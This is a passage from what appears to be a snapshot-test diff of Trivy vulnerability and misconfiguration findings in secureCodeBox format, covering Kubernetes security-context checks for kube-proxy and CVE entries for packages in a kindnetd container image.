"Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV017", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv017", - ], - }, - "category": "Misconfiguration", - "description": "Privileged containers share namespaces with the host system and do not offer any security. They should be used exclusively for system containers that require high privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.privileged' to 'false'.", - "name": "Privileged container(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.privileged' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv017", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "1:2.36.1-8+deb11u1", - "packageName": "bsdutils", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://bugzilla.redhat.com/2164492", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", - ], - }, - "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.20.10", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1664", - "installedVersion": "1.20.9", - "packageName": "dpkg", - "references": [ - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", - "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", - "https://lists.debian.org/debian-security-announce/2022/msg00115.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", - "https://security.netapp.com/advisory/ntap-20221007-0002/", - "https://ubuntu.com/security/notices/USN-5446-1", - "https://ubuntu.com/security/notices/USN-5446-2", - ], - }, - "category": "Vulnerability", - "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.2.27-2+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.27-2+deb11u1", - "packageName": "gpgv", - "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - 